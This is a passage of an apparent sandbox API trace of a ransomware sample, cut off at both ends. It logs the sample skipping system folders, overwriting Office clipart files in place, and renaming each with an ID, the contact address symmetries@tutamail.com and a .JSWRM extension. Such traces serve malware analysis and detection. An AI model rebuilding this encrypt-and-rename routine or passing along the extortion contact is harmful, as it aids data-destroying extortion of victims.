(lpString1="NA00806_.WMF", lpString2="recovery") returned -1 [0091.532] lstrcmpiW (lpString1="NA00806_.WMF", lpString2="perflogs") returned -1 [0091.532] lstrcmpiW (lpString1="NA00806_.WMF", lpString2="documents and settings") returned 1 [0091.532] lstrcmpiW (lpString1="NA00806_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.532] lstrcmpiW (lpString1="NA00806_.WMF", lpString2="system volume information") returned -1 [0091.533] lstrcmpiW (lpString1="NA00806_.WMF", lpString2="msocache") returned 1 [0091.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0091.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00806_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00806_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00806_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0091.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0091.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00806_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00806_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00806_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0091.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0091.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0091.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0091.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00806_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00806_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.534] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1928) returned 1 [0091.534] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x780) returned 0x20c6c0 [0091.534] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x780, lpOverlapped=0x0) returned 1 [0091.535] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.536] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x780, lpOverlapped=0x0) returned 1 [0091.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0091.536] CloseHandle (hObject=0x314) returned 1 [0091.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0091.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0091.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0091.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0091.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0091.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0091.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0091.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0091.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.536] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00806_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00806_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00806_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00806_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0091.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0091.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0091.537] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xba4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00807_.WMF", cAlternateFileName="")) returned 1 [0091.537] lstrcmpiW (lpString1="NA00807_.WMF", lpString2=".") returned 1 [0091.537] lstrcmpiW (lpString1="NA00807_.WMF", lpString2="..") returned 1 [0091.537] lstrcmpiW (lpString1="NA00807_.WMF", lpString2="...") returned 1 [0091.537] lstrcmpiW (lpString1="NA00807_.WMF", lpString2="windows") returned -1 [0091.537] lstrcmpiW (lpString1="NA00807_.WMF", lpString2="recovery") returned -1 [0091.537] lstrcmpiW (lpString1="NA00807_.WMF", lpString2="perflogs") returned -1 [0091.537] lstrcmpiW (lpString1="NA00807_.WMF", lpString2="documents and settings") returned 1 [0091.537] lstrcmpiW (lpString1="NA00807_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.537] lstrcmpiW (lpString1="NA00807_.WMF", lpString2="system volume information") returned -1 [0091.537] lstrcmpiW (lpString1="NA00807_.WMF", lpString2="msocache") returned 1 [0091.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0091.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00807_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00807_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00807_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0091.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0091.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00807_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00807_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00807_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0091.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0091.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0091.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0091.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00807_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00807_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.538] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2980) returned 1 [0091.538] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xba0) returned 0x23fc98 [0091.538] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xba0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xba0, lpOverlapped=0x0) returned 1 [0091.540] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.540] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xba0, lpOverlapped=0x0) returned 1 [0091.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0091.540] CloseHandle (hObject=0x314) returned 1 [0091.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0091.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0091.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0091.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0091.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0091.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0091.540] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.540] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00807_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00807_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00807_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00807_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0091.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0091.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0091.541] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x514, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00808_.WMF", cAlternateFileName="")) returned 1 [0091.541] lstrcmpiW (lpString1="NA00808_.WMF", lpString2=".") returned 1 [0091.541] lstrcmpiW (lpString1="NA00808_.WMF", lpString2="..") returned 1 [0091.541] lstrcmpiW (lpString1="NA00808_.WMF", lpString2="...") returned 1 [0091.541] lstrcmpiW (lpString1="NA00808_.WMF", lpString2="windows") returned -1 [0091.541] lstrcmpiW (lpString1="NA00808_.WMF", lpString2="recovery") returned -1 [0091.541] lstrcmpiW (lpString1="NA00808_.WMF", lpString2="perflogs") returned -1 [0091.541] lstrcmpiW (lpString1="NA00808_.WMF", lpString2="documents and settings") returned 1 [0091.541] lstrcmpiW (lpString1="NA00808_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.541] lstrcmpiW (lpString1="NA00808_.WMF", lpString2="system volume information") returned -1 [0091.541] lstrcmpiW (lpString1="NA00808_.WMF", lpString2="msocache") returned 1 [0091.541] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0091.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00808_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00808_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00808_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0091.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0091.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00808_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00808_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00808_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0091.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0091.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0091.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.542] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0091.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00808_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.542] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1300) returned 1 [0091.542] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x510) returned 0x230a00 [0091.542] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x510, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x510, lpOverlapped=0x0) returned 1 [0091.544] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.544] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x510, lpOverlapped=0x0) returned 1 [0091.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0091.544] CloseHandle (hObject=0x314) returned 1 [0091.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0091.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0091.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0091.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0091.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0091.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0091.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0091.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0091.544] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00808_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00808_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00808_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00808_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0091.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0091.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0091.545] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x608, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00809_.WMF", cAlternateFileName="")) returned 1 [0091.545] lstrcmpiW (lpString1="NA00809_.WMF", lpString2=".") returned 1 [0091.545] lstrcmpiW (lpString1="NA00809_.WMF", lpString2="..") returned 1 [0091.545] lstrcmpiW (lpString1="NA00809_.WMF", lpString2="...") returned 1 [0091.545] lstrcmpiW (lpString1="NA00809_.WMF", lpString2="windows") returned -1 [0091.545] lstrcmpiW (lpString1="NA00809_.WMF", lpString2="recovery") returned -1 [0091.545] lstrcmpiW (lpString1="NA00809_.WMF", lpString2="perflogs") returned -1 [0091.545] lstrcmpiW (lpString1="NA00809_.WMF", lpString2="documents and settings") returned 1 [0091.545] lstrcmpiW (lpString1="NA00809_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.545] lstrcmpiW (lpString1="NA00809_.WMF", lpString2="system volume information") returned -1 [0091.545] lstrcmpiW (lpString1="NA00809_.WMF", lpString2="msocache") returned 1 [0091.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0091.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00809_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00809_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00809_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0091.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0091.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00809_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00809_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00809_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0091.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0091.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 